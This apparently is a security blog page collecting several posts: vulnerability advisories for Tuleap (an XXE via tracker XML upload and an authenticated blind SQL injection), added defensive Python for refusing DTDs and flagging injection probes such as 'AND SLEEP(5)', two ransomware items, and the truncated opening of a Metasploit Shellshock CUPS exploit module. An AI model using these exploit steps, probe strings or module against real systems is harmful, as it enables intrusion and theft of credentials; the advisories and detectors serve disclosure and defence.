          <description>Who is in charge of this artifact</description>
          <properties size="7"/>
          <bind type="users">
            <items>
              <item label="group_members"/>
            </items>
          </bind>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F17" rank="283">
      <name>fieldset1</name>
      <label>Stage</label>
      <formElements>
        <formElement type="column" ID="F18" rank="0">
          <name>column3</name>
          <label>Stage 1</label>
          <formElements>
            <formElement type="sb" ID="F19" rank="2">
              <name>status_id</name>
              <label>Status</label>
              <description>Artifact Status</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F19-V0" label="New"/>
                  <item ID="F19-V1" label="Unconfirmed"/>
                  <item ID="F19-V2" label="Verified"/>
                  <item ID="F19-V3" label="Resolved"/>
                  <item ID="F19-V4" label="Closed"/>
                  <item ID="F19-V5" label="Reopened"/>
                </items>
              </bind>
            </formElement>
            <formElement type="sb" ID="F20" rank="5" use_it="0">
              <name>stage</name>
              <label>Stage</label>
              <description>Stage in the life cycle of the artifact</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F20-V0" label="New">
                    <description>The artifact has just been submitted</description>
                  </item>
                  <item ID="F20-V1" label="Analyzed">
                    <description>The cause of the artifact has been identified and documented</description>
                  </item>
                  <item ID="F20-V2" label="Accepted">
                    <description>The artifact will be worked on.</description>
                  </item>
                  <item ID="F20-V3" label="Under Implementation">
                    <description>The artifact is being worked on.</description>
                  </item>
                  <item ID="F20-V4" label="Ready for Review">
                    <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
                  </item>
                  <item ID="F20-V5" label="Ready for Test">
                    <description>Updated/Created software is ready to be included in the next build</description>
                  </item>
                  <item ID="F20-V6" label="In Test">
                    <description>Updated/Created software is in the build and is ready to enter the test phase</description>
                  </item>
                  <item ID="F20-V7" label="Approved">
                    <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
                  </item>
                  <item ID="F20-V8" label="Declined">
                    <description>The artifact was not accepted.</description>
                  </item>
                  <item ID="F20-V9" label="Done">
                    <description>The artifact is closed.</description>
                  </item>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F21" rank="2">
          <name>column4</name>
          <label>Stage 2</label>
          <formElements>
            <formElement type="sb" ID="F22" rank="0">
              <name>resolution</name>
              <label>Resolution</label>
              <description>The resolution field indicates what happened to the bug.</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F22-V0" label="Fixed"/>
                  <item ID="F22-V1" label="Will not fix"/>
                  <item ID="F22-V2" label="Invalid"/>
                  <item ID="F22-V3" label="Later"/>
                  <item ID="F22-V4" label="Duplicate"/>
                  <item ID="F22-V5" label="Remind"/>
                  <item ID="F22-V6" label="Works for me"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F23" rank="3">
          <name>column9</name>
          <label>Stage 3</label>
          <formElements>
            <formElement type="sb" ID="F24" rank="0" notifications="1">
              <name>assigned_to</name>
              <label>Assigned to</label>
              <description>Who is in charge of solving the artifact</description>
              <bind type="users">
                <items>
                  <item label="group_members"/>
                </items>
              </bind>
            </formElement>
          </formElements>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F25" rank="284">
      <name>fieldset1</name>
      <label>Attachments</label>
      <formElements>
        <formElement type="file" ID="F26" rank="0">
          <name>attachment</name>
          <label>Attachments</label>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F27" rank="286">
      <name>fieldset1</name>
      <label>References</label>
      <formElements>
        <formElement type="cross" ID="F28" rank="0">
          <name>cross_references</name>
          <label>Cross references</label>
          <description>List of items referenced by or referencing this item.</description>
        </formElement>
        <formElement type="art_link" ID="F29" rank="1" use_it="0">
          <name>references</name>
          <label>References</label>
          <properties size="30"/>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F30" rank="287">
      <name>fieldset1</name>
      <label>Permissions</label>
      <formElements>
        <formElement type="perm" ID="F31" rank="0">
          <name>permissions_on_artifact</name>
          <label>Permissions on artifact</label>
          <description>Let users groups to define who can access an artifact.</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="sb" ID="F32" rank="26" use_it="0">
      <name>platform</name>
      <label>Platform</label>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F32-V0" label="Linux"/>
          <item ID="F32-V1" label="Windows XP"/>
          <item ID="F32-V2" label="Solaris"/>
          <item ID="F32-V3" label="Windows 2000"/>
          <item ID="F32-V4" label="Other"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F33" rank="28" use_it="0">
      <name>source</name>
      <label>Source</label>
      <description>Customer from which the request comes from.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F34" rank="30" use_it="0">
      <name>version</name>
      <label>Version</label>
      <description>Product version concerned by the bug.</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="title">
      <shortname>title</shortname>
      <label>Titre</label>
      <description>Définir le titre d'un artéfact</description>
      <field REF="F8"/>
    </semantic>
    <semantic type="status">
      <shortname>status</shortname>
      <label>État</label>
      <description>Définir l'état d'un artifact</description>
      <field REF="F19"/>
      <open_values>
        <open_value REF="F19-V0"/>
        <open_value REF="F19-V1"/>
        <open_value REF="F19-V2"/>
        <open_value REF="F19-V3"/>
        <open_value REF="F19-V5"/>
      </open_values>
    </semantic>
    <semantic type="contributor">
      <shortname>contributor</shortname>
      <label>Contributor/assignee</label>
      <description>Define the contributor/assignee of an artifact</description>
      <field REF="F24"/>
    </semantic>
    <semantic type="tooltip">
      <field REF="F2"/>
      <field REF="F8"/>
      <field REF="F19"/>
    </semantic>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Bugs</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F5"/>
        </criteria>
        <criteria rank="5">
          <field REF="F8"/>
        </criteria>
        <criteria rank="6">
          <field REF="F9"/>
        </criteria>
        <criteria rank="7">
          <field REF="F22"/>
        </criteria>
        <criteria rank="8">
          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
            <name>Charts</name>
            <description>Graphic Report</description>
            <charts>
                <chart type="pie" width="600" height="400" rank="0" base="F19">
                    <title>Status</title>
                    <description>Number of Artifacts by Status</description>
                </chart>
                <chart type="bar" width="600" height="400" rank="1" base="F11">
                    <title>Severity</title>
                    <description>Number of Artifacts by severity level</description>
                </chart>
                <chart type="pie" width="600" height="400" rank="2" base="F24">
                    <title>Assignment</title>
                    <description>Number of Artifacts by Assignee</description>
                </chart>
            </charts>
        </renderer>
      </renderers>
    </report>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias>
        <criteria rank="0">
          <field REF="F19"/>
        </criteria>
        <criteria rank="1">
          <field REF="F24"/>
        </criteria>
        <criteria rank="2">
          <field REF="F6"/>
        </criteria>
        <criteria rank="3">
          <field REF="F2"/>
        </criteria>
        <criteria rank="4">
          <field REF="F13"/>
        </criteria>
      </criterias>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns>
            <field REF="F2"/>
            <field REF="F8"/>
            <field REF="F6"/>
            <field REF="F24"/>
            <field REF="F3"/>
          </columns>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow>
    <field_id REF="F19"/>
    <is_used>1</is_used>
    <transitions>
        <transition>
            <from_id REF="null"/>
            <to_id REF="F19-V0"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V1"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V2"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V3"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V4"/>
            <to_id REF="F19-V5"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V5"/>
            <to_id REF="F19-V4"/>
        </transition>
        <transition>
            <from_id REF="F19-V0"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V1"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V3"/>
        </transition>
        <transition>
            <from_id REF="F19-V2"/>
            <to_id REF="F19-V4"/>
        </transition>
    </transitions>
  </workflow>
  <permissions>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F5" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F6" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F9" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F14" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F15" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F19" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F20" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F22" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F24" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F26" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F28" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F29" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F31" ugroup="UGROUP_PROJECT_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F32" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F33" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F34" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <!--TODO TRACKER_ADMIN <permission scope="field" REF="F31" ugroup="UGROUP_PLUGIN_TRACKER_ADMIN" type="PLUGIN_TRACKER_FIELD_UPDATE"/> -->
  </permissions>
</tracker>
 
-----------------------------12077103611061
Content-Disposition: form-data; name="name"
 
Bugs
-----------------------------12077103611061
Content-Disposition: form-data; name="description"
 
Bugs Tracker
-----------------------------12077103611061
Content-Disposition: form-data; name="itemname"
 
bug
-----------------------------12077103611061
Content-Disposition: form-data; name="Create"
 
Créer
-----------------------------12077103611061--
 
 
2) The server will return a 'tracker number' in its response. The response contains a link to the specific "tracker", which will be similar to the following:
 
 
https://[ip]/plugins/tracker/?group_id=102&tracker=12
 
 
3) Using the retrieved tracker number and URL, the XXE can be triggered by visiting the retrieved URL:
 
 
https://[ip]/plugins/tracker/?group_id=102&tracker=12
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7177/
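
A defensive counterpart to the steps above, added here as an illustration and not part of the Portcullis advisory or of Tuleap's code: an import gate that refuses any uploaded tracker XML carrying a DOCTYPE, so that no entity is ever declared or resolved. Tuleap itself is PHP; the use of Python's expat parser, the function names and both sample documents are assumptions constructed for this sketch.

```python
import xml.parsers.expat

# Constructed sample: a cut-down tracker definition using field IDs from the page.
BENIGN_TRACKER = b"""<?xml version="1.0" encoding="UTF-8"?>
<tracker>
  <name>Bugs</name>
  <formElements>
    <formElement type="column" ID="F21" rank="2">
      <name>column4</name>
      <label>Stage 2</label>
      <formElements>
        <formElement type="sb" ID="F22" rank="0">
          <name>resolution</name>
          <label>Resolution</label>
        </formElement>
      </formElements>
    </formElement>
  </formElements>
</tracker>
"""

# Constructed sample: the same kind of upload, but declaring an external entity.
# The SYSTEM identifier is a placeholder that points at nothing.
DTD_TRACKER = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE tracker [ <!ENTITY probe SYSTEM "file:///constructed-placeholder"> ]>
<tracker>
  <name>&probe;</name>
</tracker>
"""


class UnsafeTrackerXML(ValueError):
    """The upload carries a DOCTYPE, the only place entities can be declared."""


def load_tracker_fields(xml_bytes):
    """Return {formElement ID: field name}; refuse any document with a DTD."""
    parser = xml.parsers.expat.ParserCreate()
    open_elements = []   # names of the elements currently open
    open_fields = []     # IDs of the <formElement>s currently open
    name_text = []       # character data of the <name> being read
    fields = {}

    def refuse_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Fires before any <!ENTITY ...> is processed, so nothing is expanded.
        raise UnsafeTrackerXML("DOCTYPE %r refused" % doctype_name)

    def start(name, attrs):
        open_elements.append(name)
        if name == "formElement":
            open_fields.append(attrs.get("ID"))
        elif name == "name":
            del name_text[:]

    def chars(data):
        if open_elements and open_elements[-1] == "name":
            name_text.append(data)

    def end(name):
        open_elements.pop()
        if name == "formElement":
            open_fields.pop()
        elif name == "name" and open_elements and open_elements[-1] == "formElement":
            # Only a <name> that is a direct child of <formElement> names a field.
            fields[open_fields[-1]] = "".join(name_text).strip()

    parser.StartDoctypeDeclHandler = refuse_doctype
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(xml_bytes, True)
    return fields


def check_upload(xml_bytes):
    """Gate for an import endpoint: returns (accepted, fields or reason)."""
    try:
        return True, load_tracker_fields(xml_bytes)
    except UnsafeTrackerXML as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, "malformed XML: %s" % exc


if __name__ == "__main__":
    print(check_upload(BENIGN_TRACKER))
    print(check_upload(DTD_TRACKER))
```

Refusing the DOCTYPE outright is stricter than disabling external entity loading alone, and it also stops entity-expansion abuse in the same uploads.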
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 

29Oct/140

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
A SQL injection has been found and confirmed within the software, exploitable as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability an attacker needs to be in a position to access the '/plugins/docman/' URN.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
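
One way to look for attempts against this parameter in web server logs, added here as an example and not part of the advisory: decode global_txt on docman search requests and match it against a few SQL-injection indicators. The log format (Apache combined), the rule set, the function names and the sample lines are all constructed assumptions, and the check only sees GET requests such as the one shown above.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines; addresses are from the 192.0.2.0/24 documentation range.
SAMPLE_LOG = """\
192.0.2.5 - alice [29/Oct/2014:10:01:02 +0000] "GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=release+notes&global_filtersubmit=Apply HTTP/1.1" 200 5120
192.0.2.7 - carol [29/Oct/2014:10:01:40 +0000] "GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=user%27s+guide&global_filtersubmit=Apply HTTP/1.1" 200 4977
192.0.2.9 - bob [29/Oct/2014:10:02:10 +0000] "GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a%27+AND+SLEEP%285%29--+&global_filtersubmit=Apply HTTP/1.1" 200 4301
192.0.2.9 - bob [29/Oct/2014:10:02:16 +0000] "GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a%27+AND+%271%27%3D%271&global_filtersubmit=Apply HTTP/1.1" 200 4301
192.0.2.11 - dave [29/Oct/2014:10:03:00 +0000] "GET /plugins/tracker/?group_id=102&tracker=12 HTTP/1.1" 200 8800
"""

LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Hypothetical indicator set, applied to the URL-decoded parameter value.
RULES = {
    "quote_then_sql_keyword": re.compile(r"['\"]\s*(?:and|or|union|select)\b", re.I),
    "time_delay_function": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "trailing_sql_comment": re.compile(r"(?:--(?:\s|$)|/\*)"),
}


def suspicious_docman_searches(log_text):
    """Return one record per docman search whose global_txt matches a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.startswith("/plugins/docman/"):
            continue
        query = parse_qs(url.query)  # decodes %xx and '+'
        if query.get("action") != ["search"]:
            continue
        for value in query.get("global_txt", []):
            matched = sorted(name for name, rx in RULES.items() if rx.search(value))
            if matched:
                hits.append({
                    "client": m.group("client"),
                    "user": m.group("user"),
                    "value": value,
                    "rules": matched,
                })
    return hits


def clients_by_hit_count(hits):
    """Blind injection needs many requests, so rank clients by flagged searches."""
    return Counter(h["client"] for h in hits).most_common()


if __name__ == "__main__":
    found = suspicious_docman_searches(SAMPLE_LOG)
    for hit in found:
        print(hit["client"], hit["user"], hit["rules"], repr(hit["value"]))
    print(clients_by_hit_count(found))
```

The benign search containing an apostrophe ("user's guide") is not flagged, while both probes from the same authenticated session are, which is the pattern to alert on.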
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 

28Oct/140

Ransomware virus removal, even for non-expert users

Ransomware is a virus that encrypts all the data on the hard disk and prevents Windows from starting normally, showing a screen that demands money in exchange for the data on the hard disk.


Here is a step-by-step guide to removing the virus...
What you need:
1) The infected PC (obviously)
2) A blank CD or DVD
3) Another PC (or the infected PC with an internet connection)


Procedure:
These kinds of viruses are essentially designed to send the average user into a panic, so one piece of advice you should follow is to stay calm and stay focused on how the virus behaves, because like everything else, viruses have vulnerabilities too.
That said, we can begin.
1) When Windows starts, press the F8 key repeatedly. If the PC starts up normally anyway, try other keys (F1, F2, F3, F4, etc.). If instead all goes well, use the arrow keys to select SAFE MODE WITH NETWORKING from the entries that appear.


1-BIS) Some viruses manage to block safe mode as well. In that case, move to a computer that is NOT INFECTED and has a CD/DVD drive, then go on to step 2.


2) Search for Kaspersky Rescue Disk on Google, download it and burn it to a CD-R.


3) Now go back to the infected PC and follow the steps in point 4.
Press F2 or Del repeatedly when the manufacturer's screen appears, go to the startup or boot order tab and highlight the DVD-R entry (or CD-R; sometimes you will find the model of your DVD drive instead). Once it is highlighted, press F4 or F5 until it is first in the list.
At this point press Esc, then Enter, and then Enter again (if Yes is highlighted).
Now turn the PC off and on again. A screen will tell us to press a key to boot from DVD or CD-ROM; do so.
We are now in the rescue disk: start the full scan and wait for the report, then quarantine all the detected files.


AND BYE BYE VIRUS!!


I hope this has been helpful to everyone!!!


Rescue Disk link (original site): http://rescuedisk.kasperskylabs.com/..._rescue_10.iso
P.S. Before repeatedly clicking the Next button in the Softonic installer, heedless of the PUPs (Potentially Unwanted Programs) that will be installed, try reading and unticking the programs and toolbars we do not want.

Source: http://www.tomshw.it/forum/sicurezza/421733-guida-rimozione-virus-ransomware-anche-per-utenti-non-esperti.html

28Oct/140

Ransomware web alert: the malware that scams by phone

RANSOMWARE

From one moment to the next you can find yourself held hostage by computer pirates, with your own computer unexpectedly locked.
And be able to unlock it only by calling a very expensive premium-rate number.
It is all the fault of a piece of malware, says the Centro Nazionale Anticrimine Informatico per la Protezione delle Infrastrutture Critiche (the national anti-cybercrime centre for the protection of critical infrastructure) of the Postal and Communications Police Service, called "Ransomware", a trojan known to many internet users (only those running Windows operating systems on their computers) for having hit them as far back as 2006.

Back then it prevented the computer from being used and then demanded an unlock code, obtainable by connecting to sites that required the purchase of paid goods or services, amounting to outright extortion.
In some of the earlier versions, in fact, the victim was forced to buy medicines or other products on Russian sites, and only afterwards was the unlock code provided. Now the attack is head-on: in the latest version the infected PC shows the following message at startup: Attention! Windows activation period is exceeded. This windows copy is illegal and not registered properly. The further work is not possible.
For activating this copy of windows you must enter registration code. This code you can find in your windows distribution package. If you not find them you can receive it by the phone: 899 021 233 Registration code must be entered not later then three days, if it entered later the unlocking is not possible.
In other words: if you want to activate your copy of Windows you must enter a registration code, which you can receive by phone by calling this number.
You have to do all this within three days, otherwise unlocking the computer will not be possible.
In fact the PC will not suffer any significant damage, but if the victim were to call the number shown in the message they would spend 1.75 euros per minute and would not receive any code, but would simply be redirected to another premium-rate telephone service.

Italian users are not the only targets of the scam, because the malware is programmed to recognise the geographical origin and language of the target; numbers are therefore also provided for users in Austria, Belgium and Switzerland, for which the Polizia di Stato, through CNAIPIC, has already forwarded a report to the competent authorities. In addition, besides the investigations aimed at identifying the author of the scam, the procedure to block the number 899 021 233 has been started, so that there can be no further harm to internet users.

Source: http://www.repubblica.it/tecnologia/2011/04/29/news/allarme_malware-15513920/

28Oct/140

CUPS Filter Bash Environment Variable Code Injection

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'CUPS Filter Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a post-auth code injection in specially crafted
        environment variables in Bash, specifically targeting CUPS filters
        through the PRINTER_INFO and PRINTER_LOCATION variables by default.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'lcamtuf', # CVE-2014-6278
        'Brendan Coles <bcoles[at]gmail.com>' # msf
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['CVE', '2014-6278'],
        ['EDB', '34765'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Privileged' => false,
      'Arch' => ARCH_CMD,
      'Platform' => 'unix',
      'Payload' =>
        {
          'Space' => 1024,
          'BadChars' => "\x00\x0A\x0D",
          'DisableNops' => true
        },
      'Compat' =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic bash awk ruby'
        },
      # Tested:
      # - CUPS version 1.4.3 on Ubuntu 10.04 (x86)
      # - CUPS version 1.5.3 on Debian 7 (x64)
      # - CUPS version 1.6.2 on Fedora 19 (x64)
      # - CUPS version 1.7.2 on Ubuntu 14.04 (x64)
      'Targets' =>  [[ 'Automatic Targeting', { 'auto' => true } ]],
      'DefaultTarget' => 0,
